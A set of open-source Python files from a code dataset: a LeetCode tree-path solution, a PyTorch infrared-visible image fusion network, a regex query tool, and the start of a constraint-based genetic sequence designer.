Solution:\n def longestZigZag(self, root: TreeNode) -> int:\n output = []\n\n def dfs(node, output, cnt, direction): # direction: 0 root. 
1 left, 2 right\n if node:\n if node.left == node.right == None: # the leaf node\n output.append(cnt) # record the current path length\n else:\n if direction == 0: # root\n if node.left != None:\n dfs(node.left, output, cnt + 1, 1)\n if node.right != None:\n dfs(node.right, output, cnt + 1, 2)\n elif direction == 1:\n if node.right != None:\n dfs(node.right, output, cnt + 1, 2)\n else:\n output.append(cnt) # the path ends here\n if node.left != None:\n dfs(node.left, output, 1, 1) # use current node as the root and check next\n elif direction == 2:\n if node.left != None:\n dfs(node.left, output, cnt + 1, 1)\n else:\n output.append(cnt) # the path ends here\n if node.right != None:\n dfs(node.right, output, 1, 2) # use current node as the root and check next\n\n if root == None: return 0\n output = []\n dfs(root, output, 0, 0) # if the root node is not None, at least 1 node in the zigzag path\n return max(output)\n\n\n\n","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1372.py","file_name":"1372.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"11813374895","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport math\nimport random\nimport pdb\n\n\nEPSILON = 1e-10\n\ndef var(x, dim=0):\n x_zero_meaned = x - x.mean(dim).expand_as(x)\n return x_zero_meaned.pow(2).mean(dim)\n\nclass MultConst(nn.Module):\n def forward(self, input):\n return 255*input\n\nclass UpsampleReshape_eval(torch.nn.Module):\n def __init__(self):\n super(UpsampleReshape_eval, self).__init__()\n self.up = nn.Upsample(scale_factor=2)\n\n def forward(self, x1, x2):\n x2 = self.up(x2)\n shape_x1 = x1.size()\n shape_x2 = x2.size()\n left = 0\n right = 0\n top = 0\n bot = 0\n if shape_x1[3] != shape_x2[3]:\n lef_right = shape_x1[3] - shape_x2[3]\n if lef_right%2 is 0.0:\n left = int(lef_right/2)\n right = int(lef_right/2)\n else:\n left = int(lef_right / 2)\n right = int(lef_right - left)\n\n if shape_x1[2] != shape_x2[2]:\n top_bot = shape_x1[2] - shape_x2[2]\n if top_bot%2 is 0.0:\n top = int(top_bot/2)\n bot = int(top_bot/2)\n else:\n top = int(top_bot / 2)\n bot = int(top_bot - top)\n\n reflection_padding = [left, right, top, bot]\n reflection_pad = nn.ReflectionPad2d(reflection_padding)\n x2 = reflection_pad(x2)\n return x2\n\n# Dense convolution unit\nclass DenseConv2d(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride):\n super(DenseConv2d, self).__init__()\n self.dense_conv = ConvLayer(in_channels, out_channels, kernel_size, stride)\n\n def forward(self, x):\n out = self.dense_conv(x)\n out = torch.cat([x, out], 1)\n return out\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass qkv_transform(nn.Conv1d):\n \"\"\"Conv1d for qkv_transform\"\"\"\n\ndef _make_layer(self, block, planes, blocks, kernel_size=56, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, groups=self.groups,\n base_width=self.base_width, 
dilation=previous_dilation, \n norm_layer=norm_layer, kernel_size=kernel_size))\n self.inplanes = planes * block.expansion\n if stride != 1:\n kernel_size = kernel_size // 2\n\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer, kernel_size=kernel_size))\n\n return nn.Sequential(*layers)\n\n# Dense Block unit\n# light version\nclass DenseBlock_light(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride):\n super(DenseBlock_light, self).__init__()\n # out_channels_def = 16\n out_channels_def = int(in_channels / 2)\n # out_channels_def = out_channels\n denseblock = []\n denseblock += [ConvLayer(in_channels, out_channels_def, kernel_size, stride),\n ConvLayer(out_channels_def, out_channels, 1, stride)]\n self.denseblock = nn.Sequential(*denseblock)\n\n def forward(self, x):\n out = self.denseblock(x)\n return out\n\nclass ConvLayer(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, is_last=False):\n super(ConvLayer, self).__init__()\n reflection_padding = int(np.floor(kernel_size / 2))\n self.reflection_pad = nn.ReflectionPad2d(reflection_padding)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride)\n self.dropout = nn.Dropout2d(p=0.5)\n self.is_last = is_last\n\n def forward(self, x):\n out = self.reflection_pad(x)\n out = self.conv2d(out)\n if self.is_last is False:\n # out = F.normalize(out)\n out = F.relu(out, inplace=True)\n # out = self.dropout(out)\n return out\n\n# Convolution operation\nclass f_ConvLayer(torch.nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, is_last=False):\n super(f_ConvLayer, self).__init__()\n reflection_padding = int(np.floor(kernel_size / 2))\n self.reflection_pad = nn.ReflectionPad2d(reflection_padding)\n self.conv2d = nn.Conv2d(in_channels, out_channels, kernel_size, stride)\n #self.batch_norm = nn.BatchNorm2d(out_channels)\n self.dropout = nn.Dropout2d(p=0.5)\n self.is_last = is_last\n\n def forward(self, x):\n out = self.reflection_pad(x)\n out = self.conv2d(out)\n #out = self.batch_norm(out)\n out = F.relu(out, inplace=True)\n return out\n\nclass FusionBlock_res(torch.nn.Module):\n def __init__(self, channels, img_size, index):\n super(FusionBlock_res, self).__init__()\n\n self.axial_attn = AxialBlock(channels, channels//2, kernel_size=img_size)\n\n self.axial_fusion = nn.Sequential(f_ConvLayer(2*channels, channels, 1, 1))\n self.conv_fusion = nn.Sequential(f_ConvLayer(channels, channels, 1, 1))\n #self.conv_fusion_bn = nn.BatchNorm2d(channels)\n\n\n block = []\n block += [f_ConvLayer(2*channels, channels, 1, 1),\n f_ConvLayer(channels, channels, 3, 1), \n f_ConvLayer(channels, channels, 3, 1)]\n self.bottelblock = nn.Sequential(*block)\n #self.block_bn = nn.BatchNorm2d(channels)\n #self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x_ir, x_vi):\n # initial fusion - conv\n a_cat = torch.cat([self.axial_attn(x_ir), self.axial_attn(x_vi)], 1)\n a_init = self.axial_fusion(a_cat)\n\n x_cvi = self.conv_fusion(x_vi)\n x_cir = self.conv_fusion(x_ir)\n \n out = torch.cat([x_cvi, x_cir], 1)\n out = self.bottelblock(out)\n out = a_init + out \n\n return out\n\n\n# Fusion network, 4 groups of features\nclass Fusion_network(nn.Module):\n def __init__(self, nC, fs_type):\n super(Fusion_network, self).__init__()\n self.fs_type = fs_type\n img_size = [256,128,64,32]\n #img_size = [84,42,21,10]\n\n self.fusion_block1 = 
FusionBlock_res(nC[0], img_size[0], 0)\n self.fusion_block2 = FusionBlock_res(nC[1], img_size[1], 1)\n self.fusion_block3 = FusionBlock_res(nC[2], img_size[2], 2)\n self.fusion_block4 = FusionBlock_res(nC[3], img_size[3], 3)\n\n def forward(self, en_ir, en_vi):\n f1_0 = self.fusion_block1(en_ir[0], en_vi[0])\n f2_0 = self.fusion_block2(en_ir[1], en_vi[1])\n f3_0 = self.fusion_block3(en_ir[2], en_vi[2])\n f4_0 = self.fusion_block4(en_ir[3], en_vi[3])\n\n return [f1_0, f2_0, f3_0, f4_0]\n\nclass Fusion_ADD(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = en_ir + en_vi\n return temp\n\nclass Fusion_AVG(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = (en_ir + en_vi) / 2\n return temp\n\nclass Fusion_MAX(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n temp = torch.max(en_ir, en_vi)\n return temp\n\nclass Fusion_SPA(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n shape = en_ir.size()\n spatial_type = 'mean'\n # calculate spatial attention\n spatial1 = spatial_attention(en_ir, spatial_type)\n spatial2 = spatial_attention(en_vi, spatial_type)\n # get weight map, soft-max\n spatial_w1 = torch.exp(spatial1) / (torch.exp(spatial1) + torch.exp(spatial2) + EPSILON)\n spatial_w2 = torch.exp(spatial2) / (torch.exp(spatial1) + torch.exp(spatial2) + EPSILON)\n\n spatial_w1 = spatial_w1.repeat(1, shape[1], 1, 1)\n spatial_w2 = spatial_w2.repeat(1, shape[1], 1, 1)\n tensor_f = spatial_w1 * en_ir + spatial_w2 * en_vi\n return tensor_f\n\n# spatial attention\ndef spatial_attention(tensor, spatial_type='sum'):\n spatial = []\n if spatial_type is 'mean':\n spatial = tensor.mean(dim=1, keepdim=True)\n elif spatial_type is 'sum':\n spatial = tensor.sum(dim=1, keepdim=True)\n return spatial\n\n# fuison strategy based on nuclear-norm (channel attention form NestFuse)\nclass Fusion_Nuclear(torch.nn.Module):\n def forward(self, en_ir, en_vi):\n shape = en_ir.size()\n # calculate channel attention\n global_p1 = nuclear_pooling(en_ir)\n global_p2 = nuclear_pooling(en_vi)\n\n # get weight map\n global_p_w1 = global_p1 / (global_p1 + global_p2 + EPSILON)\n global_p_w2 = global_p2 / (global_p1 + global_p2 + EPSILON)\n\n global_p_w1 = global_p_w1.repeat(1, 1, shape[2], shape[3])\n global_p_w2 = global_p_w2.repeat(1, 1, shape[2], shape[3])\n\n tensor_f = global_p_w1 * en_ir + global_p_w2 * en_vi\n return tensor_f\n\n# sum of S V for each chanel\ndef nuclear_pooling(tensor):\n shape = tensor.size()\n vectors = torch.zeros(1, shape[1], 1, 1).cuda()\n for i in range(shape[1]):\n u, s, v = torch.svd(tensor[0, i, :, :] + EPSILON)\n s_sum = torch.sum(s)\n vectors[0, i, 0, 0] = s_sum\n return vectors\n\n# Fusion strategy, two type\nclass Fusion_strategy(nn.Module):\n def __init__(self, fs_type):\n super(Fusion_strategy, self).__init__()\n self.fs_type = fs_type\n self.fusion_add = Fusion_ADD()\n self.fusion_avg = Fusion_AVG()\n self.fusion_max = Fusion_MAX()\n self.fusion_spa = Fusion_SPA()\n self.fusion_nuc = Fusion_Nuclear()\n\n def forward(self, en_ir, en_vi):\n if self.fs_type is 'add':\n fusion_operation = self.fusion_add\n elif self.fs_type is 'avg':\n fusion_operation = self.fusion_avg\n elif self.fs_type is 'max':\n fusion_operation = self.fusion_max\n elif self.fs_type is 'spa':\n fusion_operation = self.fusion_spa\n elif self.fs_type is 'nuclear':\n fusion_operation = self.fusion_nuc\n\n f1_0 = fusion_operation(en_ir[0], en_vi[0])\n f2_0 = fusion_operation(en_ir[1], en_vi[1])\n f3_0 = fusion_operation(en_ir[2], en_vi[2])\n f4_0 = fusion_operation(en_ir[3], en_vi[3])\n return [f1_0, 
f2_0, f3_0, f4_0]\n\n\n# NestFuse network - light, no desnse\nclass NestFuse_light2_nodense(nn.Module):\n def __init__(self, nb_filter, input_nc=1, output_nc=1, deepsupervision=True):\n super(NestFuse_light2_nodense, self).__init__()\n self.deepsupervision = deepsupervision\n block = DenseBlock_light\n output_filter = 16\n kernel_size = 3\n stride = 1\n\n self.pool = nn.MaxPool2d(2, 2)\n self.up = nn.Upsample(scale_factor=2)\n self.up_eval = UpsampleReshape_eval()\n\n # encoder\n self.conv0 = ConvLayer(input_nc, output_filter, 1, stride)\n self.DB1_0 = block(output_filter, nb_filter[0], kernel_size, 1)\n self.DB2_0 = block(nb_filter[0], nb_filter[1], kernel_size, 1)\n self.DB3_0 = block(nb_filter[1], nb_filter[2], kernel_size, 1)\n self.DB4_0 = block(nb_filter[2], nb_filter[3], kernel_size, 1)\n\n # decoder\n self.DB1_1 = block(nb_filter[0] + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_1 = block(nb_filter[1] + nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB3_1 = block(nb_filter[2] + nb_filter[3], nb_filter[2], kernel_size, 1)\n\n # short connection\n self.DB1_2 = block(nb_filter[0] * 2 + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_2 = block(nb_filter[1] * 2+ nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB1_3 = block(nb_filter[0] * 3 + nb_filter[1], nb_filter[0], kernel_size, 1)\n\n if self.deepsupervision:\n self.conv1 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv2 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv3 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n # self.conv4 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n else:\n self.conv_out = ConvLayer(nb_filter[0], output_nc, 1, stride)\n\n def encoder(self, input):\n x = self.conv0(input)\n x1_0 = self.DB1_0(x)\n x2_0 = self.DB2_0(self.pool(x1_0))\n x3_0 = self.DB3_0(self.pool(x2_0))\n x4_0 = self.DB4_0(self.pool(x3_0))\n # x5_0 = self.DB5_0(self.pool(x4_0))\n return [x1_0, x2_0, x3_0, x4_0]\n\n def decoder_train(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up(f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up(f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up(x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up(f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up(x3_1)], 1))\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up(x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\n def decoder_eval(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up_eval(f_en[0], f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up_eval(f_en[1], f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up_eval(f_en[0], x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up_eval(f_en[2], f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up_eval(f_en[1], x3_1)], 1))\n\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up_eval(f_en[0], x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\nclass RFN_decoder(nn.Module):\n def __init__(self, nb_filter, input_nc=1, output_nc=1, deepsupervision=True):\n super(RFN_decoder, self).__init__()\n self.deepsupervision = 
deepsupervision\n block = DenseBlock_light\n output_filter = 16\n kernel_size = 3\n stride = 1\n\n self.pool = nn.MaxPool2d(2, 2)\n self.up = nn.Upsample(scale_factor=2)\n self.up_eval = UpsampleReshape_eval()\n\n # decoder\n self.DB1_1 = block(nb_filter[0] + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_1 = block(nb_filter[1] + nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB3_1 = block(nb_filter[2] + nb_filter[3], nb_filter[2], kernel_size, 1)\n\n # short connection\n self.DB1_2 = block(nb_filter[0] * 2 + nb_filter[1], nb_filter[0], kernel_size, 1)\n self.DB2_2 = block(nb_filter[1] * 2+ nb_filter[2], nb_filter[1], kernel_size, 1)\n self.DB1_3 = block(nb_filter[0] * 3 + nb_filter[1], nb_filter[0], kernel_size, 1)\n\n if self.deepsupervision:\n self.conv1 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv2 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n self.conv3 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n # self.conv4 = ConvLayer(nb_filter[0], output_nc, 1, stride)\n else:\n self.conv_out = ConvLayer(nb_filter[0], output_nc, 1, stride)\n\n def decoder_train(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up(f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up(f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up(x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up(f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up(x3_1)], 1))\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up(x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\n def decoder_eval(self, f_en):\n x1_1 = self.DB1_1(torch.cat([f_en[0], self.up_eval(f_en[0], f_en[1])], 1))\n\n x2_1 = self.DB2_1(torch.cat([f_en[1], self.up_eval(f_en[1], f_en[2])], 1))\n x1_2 = self.DB1_2(torch.cat([f_en[0], x1_1, self.up_eval(f_en[0], x2_1)], 1))\n\n x3_1 = self.DB3_1(torch.cat([f_en[2], self.up_eval(f_en[2], f_en[3])], 1))\n x2_2 = self.DB2_2(torch.cat([f_en[1], x2_1, self.up_eval(f_en[1], x3_1)], 1))\n\n x1_3 = self.DB1_3(torch.cat([f_en[0], x1_1, x1_2, self.up_eval(f_en[0], x2_2)], 1))\n\n if self.deepsupervision:\n output1 = self.conv1(x1_1)\n output2 = self.conv2(x1_2)\n output3 = self.conv3(x1_3)\n # output4 = self.conv4(x1_4)\n return [output1, output2, output3]\n else:\n output = self.conv_out(x1_3)\n return [output]\n\nclass AxialAttention(nn.Module):\n def __init__(self, in_planes, out_planes, groups=8, kernel_size=56,\n stride=1, bias=False, width=False):\n assert (in_planes % groups == 0) and (out_planes % groups == 0)\n super(AxialAttention, self).__init__()\n self.in_planes = in_planes\n self.out_planes = out_planes\n self.groups = groups\n self.group_planes = out_planes // groups\n self.kernel_size = kernel_size\n self.stride = stride\n self.bias = bias\n self.width = width\n\n # Multi-head self attention\n self.qkv_transform = qkv_transform(in_planes, out_planes * 2, kernel_size=1, stride=1,\n padding=0, bias=False)\n self.bn_qkv = nn.BatchNorm1d(out_planes * 2)\n self.bn_similarity = nn.BatchNorm2d(groups * 3)\n\n self.bn_output = nn.BatchNorm1d(out_planes * 2)\n\n # Position embedding\n self.relative = nn.Parameter(torch.randn(self.group_planes * 2, kernel_size * 2 - 1), requires_grad=True)\n query_index = torch.arange(kernel_size).unsqueeze(0)\n key_index = torch.arange(kernel_size).unsqueeze(1)\n relative_index = key_index 
- query_index + kernel_size - 1\n self.register_buffer('flatten_index', relative_index.view(-1))\n if stride > 1:\n self.pooling = nn.AvgPool2d(stride, stride=stride)\n\n self.reset_parameters()\n\n def forward(self, x):\n \n if self.width:\n x = x.permute(0, 2, 1, 3)\n else:\n x = x.permute(0, 3, 1, 2) # N, W, C, H\n N, W, C, H = x.shape\n x = x.contiguous().view(N * W, C, H)\n\n # Transformations\n qkv = self.bn_qkv(self.qkv_transform(x))\n q, k, v = torch.split(qkv.reshape(N * W, self.groups, self.group_planes * 2, H), [self.group_planes // 2, self.group_planes // 2, self.group_planes], dim=2)\n\n # Calculate position embedding\n all_embeddings = torch.index_select(self.relative, 1, self.flatten_index).view(self.group_planes * 2, self.kernel_size, self.kernel_size)\n q_embedding, k_embedding, v_embedding = torch.split(all_embeddings, [self.group_planes // 2, self.group_planes // 2, self.group_planes], dim=0)\n #pdb.set_trace()\n \n qr = torch.einsum('bgci,cij->bgij', q, q_embedding)\n kr = torch.einsum('bgci,cij->bgij', k, k_embedding).transpose(2, 3)\n \n qk = torch.einsum('bgci, bgcj->bgij', q, k)\n \n stacked_similarity = torch.cat([qk, qr, kr], dim=1)\n stacked_similarity = self.bn_similarity(stacked_similarity).view(N * W, 3, self.groups, H, H).sum(dim=1)\n #stacked_similarity = self.bn_qr(qr) + self.bn_kr(kr) + self.bn_qk(qk)\n # (N, groups, H, H, W)\n similarity = F.softmax(stacked_similarity, dim=3)\n sv = torch.einsum('bgij,bgcj->bgci', similarity, v)\n sve = torch.einsum('bgij,cij->bgci', similarity, v_embedding)\n stacked_output = torch.cat([sv, sve], dim=-1).view(N * W, self.out_planes * 2, H)\n output = self.bn_output(stacked_output).view(N, W, self.out_planes, 2, H).sum(dim=-2)\n\n if self.width:\n output = output.permute(0, 2, 1, 3)\n else:\n output = output.permute(0, 2, 3, 1)\n\n if self.stride > 1:\n output = self.pooling(output)\n\n return output\n\n def reset_parameters(self):\n self.qkv_transform.weight.data.normal_(0, math.sqrt(1. / self.in_planes))\n #nn.init.uniform_(self.relative, -0.1, 0.1)\n nn.init.normal_(self.relative, 0., math.sqrt(1. 
/ self.group_planes))\n\nclass AxialBlock(nn.Module):\n expansion = 2\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,\n base_width=64, dilation=1, norm_layer=None, kernel_size=56):\n super(AxialBlock, self).__init__()\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n width = int(planes * (base_width / 64.))\n # Both self.conv2 and self.downsample layers downsample the input when stride != 1\n self.conv_down = conv1x1(inplanes, width)\n self.bn1 = norm_layer(width)\n self.hight_block = AxialAttention(width, width, groups=groups, kernel_size=kernel_size)\n self.width_block = AxialAttention(width, width, groups=groups, kernel_size=kernel_size, stride=stride, width=True)\n self.conv_up = conv1x1(width, planes * self.expansion)\n self.bn2 = norm_layer(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv_down(x)\n out = self.bn1(out)\n out = self.relu(out)\n # print(out.shape)\n out = self.hight_block(out)\n out = self.width_block(out)\n out = self.relu(out)\n\n out = self.conv_up(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n","repo_name":"Vibashan/Image-Fusion-Transformer","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":22819,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"21"} +{"seq_id":"19941078576","text":"#!/usr/bin/env python3\nfrom __future__ import annotations\n\nfrom lib.search_tool import search_tools\nfrom lib.utils import dunders\n\n\nclass query_tool(search_tools, dunders):\n \"\"\"Query tool class containing methods to run queries for regex patterns in files.\n\n Args:\n * `fl` (str): Input file.\n * `pattern` (str): Input pattern.\n \"\"\"\n\n def __init__(self, fl: str, pattern: str) -> None:\n super().__init__(fl, pattern)\n\n @staticmethod\n def _dict_parser(dictionary: dict) -> tuple[str, str]:\n \"\"\"Dictionary parser.\n\n Args:\n * `dictionary` (dict): Dictionary object.\n\n Returns:\n `tuple[str, str]`: keys and values of a dictionary as separate strings.\n \"\"\"\n\n keys = []\n values = []\n for key, value in dictionary.items():\n keys.append(key)\n values.append(value)\n\n keys = tuple(keys)\n keys = \", \".join(keys)\n values = tuple(values)\n values = \", \".join(values)\n return keys, values\n\n def query_wrapper(self, show_idx) -> dict:\n \"\"\"Run an SQL or txt file query. 
This method is a wrapper to the methods holding the queries.\n\n        Args:\n            * `show_idx` (bool): Shows regex information in stdout.\n\n        Returns:\n            `dict`: Keys are equal to file locations and values are matched information.\n        \"\"\"\n\n        matches = self._get_matches()\n        keys, values = self._dict_parser(dictionary = matches)\n\n        if show_idx:\n            print(f\"There are {len(matches)} matches to the pattern: {self.pattern}\")\n            if self.fl.endswith(self.txt_ext):\n                if len(keys) > 1:\n                    print(f\"Pattern can be found on lines: {keys}.\")\n                else:\n                    print(f\"Pattern can be found on line {keys}.\")\n            elif self.fl.endswith('.csv'):\n                if len(keys) > 1:\n                    print(f\"Pattern can be found on columns: {keys}.\")\n                else:\n                    print(f\"Pattern can be found on column {keys}.\")\n\n        out_dict = {}\n        for key, value in zip(list(keys.split(\",\")), list(values.split(\",\"))):\n            out_dict[key] = value\n        return out_dict\n","repo_name":"CSynodinos/query-tool","sub_path":"lib/query_parser.py","file_name":"query_parser.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24329186808","text":"from constraint import *\nimport json\nimport os\n\nclass genepy:\n    def __init__(self, length: int, check_conflicts=False):\n        if length < 1:\n            raise Exception('invalid length')\n        else:\n            self.length = length\n\n        self.check_conflicts = check_conflicts\n        self.rules = {\n            'morethan': {},\n            'contains': {},\n            'exactly': {},\n            'then': {},\n            'witH': {},\n            'startswith': {},\n            'endswith': {},\n            'all_after': {},\n            'some_after': {},\n            'all_before': {},\n            'some_before': {},\n            'all_nextto': {},\n            'some_nextto': {},\n            'all_forward_if': {},\n            'all_reverse_if': {},\n            'some_forward': {},\n            'some_reverse': {},\n            'all_forward': {},\n            'all_reverse': {},\n            'represses': {},\n            'induces': {},\n            'drives': {}\n        }\n        self.problem = Problem()\n        self.solutions = None\n\n        self.containsParts = None\n        self.morethanParts = None\n        self.morethanValues = None\n        self.exactlyParts = None\n        self.exactlyValues = None\n        self.thenPartsA = None\n        self.thenPartsB = None\n\n    def change_length(self, arg: int):\n        \"\"\"Change sequence length after initialization. 
Must be called BEFORE generating solutions.\"\"\"\n        if arg < 1:\n            raise Exception('invalid length')\n        else:\n            self.length = arg\n\n    # User methods to implement Eugene rules\n    # Counting Rules\n    def morethan(self, a: str, n: int):\n        \"\"\"a MORETHAN n --> morethan(a, n)\"\"\"\n        if n > self.length or n < 1:\n            raise Exception('invalid n')\n        else:\n            self.rules['morethan'][a] = n\n\n    def contains(self, a: str):\n        \"\"\"CONTAINS a --> contains(a)\"\"\"\n        self.rules['contains'][a] = True\n\n    def exactly(self, a: str, n: int):\n        \"\"\"a EXACTLY n --> exactly(a, n) \"\"\"\n        if n > self.length:\n            raise Exception('invalid n: n must be less than or equal to N')\n        else:\n            self.rules['exactly'][a] = n\n\n    def then(self, a: str, B: str):\n        \"\"\"a THEN B --> then(a, B)\"\"\"\n        self.rules['then'][a] = B\n\n    def witH(self, a: str, B: str):\n        \"\"\"a WITH B --> witH(a, B)\"\"\"\n        self.rules['witH'][a] = B\n\n    # Positioning Rules\n    def startswith(self, a: str):\n        \"\"\"STARTSWITH a --> startswith(a) \"\"\"\n        self.rules['startswith'][a] = True\n\n    def endswith(self, a: str):\n        \"\"\"ENDSWITH a --> endswith(a)\"\"\"\n        self.rules['endswith'][a] = True\n\n    def all_after(self, a: str, B: list):\n        \"\"\"a ALL_AFTER B / a AFTER B --> all_after(a, B)\"\"\"\n        self.rules['all_after'][a] = B\n\n    def some_after(self, a: str, B: list):\n        \"\"\"a SOME_AFTER B --> some_after(a, B)\"\"\"\n        self.rules['some_after'][a] = B\n\n    def all_before(self, a: str, B: list):\n        \"\"\"a ALL_BEFORE B --> all_before(a, B)\"\"\"\n        self.rules['all_before'][a] = B\n\n    def some_before(self, a: str, B: list):\n        \"\"\"a SOME_BEFORE B --> some_before(a, B)\"\"\"\n        self.rules['some_before'][a] = B\n\n    def all_nextto(self, a: str, B: list):\n        \"\"\"a ALL_NEXTTO B --> all_nextto(a, B)\"\"\"\n        self.rules['all_nextto'][a] = B\n\n    def some_nextto(self, a: str, B: list):\n        \"\"\"a SOME_NEXTTO B --> some_nextto(a, B)\"\"\"\n        self.rules['some_nextto'][a] = B\n\n    # Orientation Rules\n    def all_forward_if(self, a: str):\n        \"\"\"ALL_FORWARD a --> all_forward(a)\"\"\"\n        self.rules['all_forward_if'][a] = True\n\n    def all_reverse_if(self, a: str):\n        \"\"\"ALL_REVERSE a --> all_reverse_if(a)\"\"\"\n        self.rules['all_reverse_if'][a] = True\n\n    def some_forward(self, a: str):\n        \"\"\"SOME_FORWARD a --> some_forward(a)\"\"\"\n        self.rules['some_forward'][a] = True\n\n    def some_reverse(self, a: str):\n        \"\"\"SOME_REVERSE a --> some_reverse(a)\"\"\"\n        self.rules['some_reverse'][a] = True\n\n    def all_forward(self):\n        \"\"\"ALL_FORWARD --> all_forward()\"\"\"\n        self.rules['all_forward'] = True\n\n    def all_reverse(self):\n        \"\"\"ALL_REVERSE --> all_reverse()\"\"\"\n        self.rules['all_reverse'] = True\n\n    # Interaction Rules\n    def represses(self, a: str, B: str):\n        \"\"\"g REPRESSES p --> represses(g, p)\"\"\"\n        self.rules['represses'][a] = B\n\n    def induces(self, a: str, B: str):\n        \"\"\"a INDUCES B --> induces(a, B)\"\"\"\n        self.rules['induces'][a] = B\n\n    def drives(self, a: str, B: str):\n        \"\"\"a DRIVES B --> drives(a, B)\"\"\"\n        self.rules['drives'][a] = B\n\n\n    # Constraint methods for python-constraint solver\n    # Not intended for user\n    def containsConstraint(self, *argv):\n        \"\"\"Returns True if potential sequence satisfies all 'contains()' constraints described by user.\"\"\"\n        variables = []\n        for arg in argv:\n            variables.append(arg)\n        parts = self.containsParts\n        count = 0\n        for x in range(len(parts)):\n            if parts[x] in variables:\n                count += 1\n        if count == len(parts):\n            return True\n        else:\n            return False\n\n    def morethanConstraint(self, *argv):\n        \"\"\"Returns True 
